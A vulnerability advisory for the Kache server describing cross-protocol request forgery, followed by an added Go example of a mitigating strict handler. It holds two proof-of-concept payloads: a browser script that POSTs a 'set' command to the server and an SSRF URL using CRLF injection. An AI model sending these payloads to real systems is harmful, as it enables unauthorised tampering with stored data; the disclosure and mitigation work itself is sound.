Kache as of commit de2c39491625c3f087027be961a17191e85f6d30 suffers from a cross protocol request forgery vulnerability.
# Title: Kache / CPRF
# Date: 03/01/2019
# Discovered by: @codexlynx
# Software Version: <= Commit: de2c39491625c3f087027be961a17191e85f6d30 (the project does not version releases yet)
# Category: go, resp, cprf
[1] CPRF (Cross Protocol Request Forgery)
--------------------------------
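The Kache server does not close the connection when it receives unknown strings. This allows a malicious actor to perform cross-protocol interactions: lines the server cannot parse (such as HTTP headers) are skipped, and any valid command that follows them on the same connection is still executed.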
- POC 1: Set a key by HTTP:
<script>
var x = new XMLHttpRequest();
x.open("POST", "https://<TARGET_ADDRESS>:<TARGET_PORT>");
x.send("set mykey myvalue\n");
</script>
- POC 2: Exploit this CPRF to set a key via SSRF + CRLF injection:
https://<VULNERABLE_TARGET>/ssrf.php?url_to_post=https://<KACHE_ADDRESS>:<KACHE_PORT>/%0D%0Aset%20mykey%20myvalue
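
- Mitigation sketch (added example, not part of the original advisory and not Kache's code): a toy inline-command handler in Go that contrasts the behaviour described above (strict=false) with closing the connection on the first unparseable line (strict=true). The serve and replay functions, the two-command table and the host name kache.example are assumptions made for the illustration.

```go
package main

import (
	"bufio"
	"fmt"
	"io"
	"strings"
)

// serve is a toy inline-command handler written for this example (hypothetical,
// not Kache's code). A non-nil error tells the caller to close the connection.
// With strict=false it keeps reading after unknown input, which is the
// behaviour the advisory describes.
func serve(r io.Reader, w io.Writer, store map[string]string, strict bool) error {
	sc := bufio.NewScanner(r)
	for sc.Scan() {
		f := strings.Fields(sc.Text())
		switch {
		case len(f) == 3 && strings.EqualFold(f[0], "set"):
			store[f[1]] = f[2]
			fmt.Fprint(w, "+OK\r\n")
		case len(f) == 2 && strings.EqualFold(f[0], "get"):
			fmt.Fprintf(w, "+%s\r\n", store[f[1]])
		default:
			fmt.Fprint(w, "-ERR unknown command\r\n")
			if strict {
				// First unparseable line: stop reading so nothing after it runs.
				return fmt.Errorf("protocol violation: %q", sc.Text())
			}
		}
	}
	return sc.Err()
}

// httpPost is a constructed sample of what a browser sends for POC 1.
const httpPost = "POST / HTTP/1.1\r\nHost: kache.example\r\n" +
	"Content-Length: 18\r\n\r\nset mykey myvalue\n"

// replay feeds the constructed request to serve and returns the resulting store.
func replay(strict bool) (map[string]string, error) {
	store := map[string]string{}
	err := serve(strings.NewReader(httpPost), io.Discard, store, strict)
	return store, err
}

func main() {
	for _, strict := range []bool{false, true} {
		store, err := replay(strict)
		fmt.Printf("strict=%v store=%v err=%v\n", strict, store, err)
	}
}
```

In strict mode the HTTP request line is rejected before the request body is read, so the embedded set command never reaches the store; a well-formed client session is unaffected.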